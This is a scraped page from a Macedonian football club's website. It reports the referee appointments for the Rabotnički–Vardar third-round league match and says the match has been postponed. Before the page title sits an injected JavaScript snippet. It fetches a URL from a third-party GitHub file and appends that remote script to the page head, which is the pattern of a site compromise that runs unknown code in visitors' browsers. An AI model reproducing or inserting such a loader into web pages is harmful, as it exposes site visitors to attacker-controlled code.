;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Мечкаровски ќе ја дели правдата на мечот со Вардар
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Мечкаровски ќе ја дели правдата на мечот со Вардар

Димитар Мечкаровски ќе биде главен судија на мечот меѓу Работнички и Вардар од 3. коло во Првата македонска фудбалска лига.

Согласно ждрепката во ФФМ за делители на правдата во 3. коло, на Мечкаровски ќе му помагаат Дејан Неделкоски и Гоце Петрески, и двајцата од Скопје, а четврти судија ќе биде Никола Караколев од Штип. Дарко Стојчевски од Скопје и Стојанче Стојанов од Штип ќе бидат дополнителните судии на натпреварот.

Натпреварот меѓу Работнички и Вардар од 3. коло во ПМФЛ, кој требаше да се одигра овој викенд, е одложен поради европските настапи на противникот. Терминот на истиот ќе биде дополнително одреден.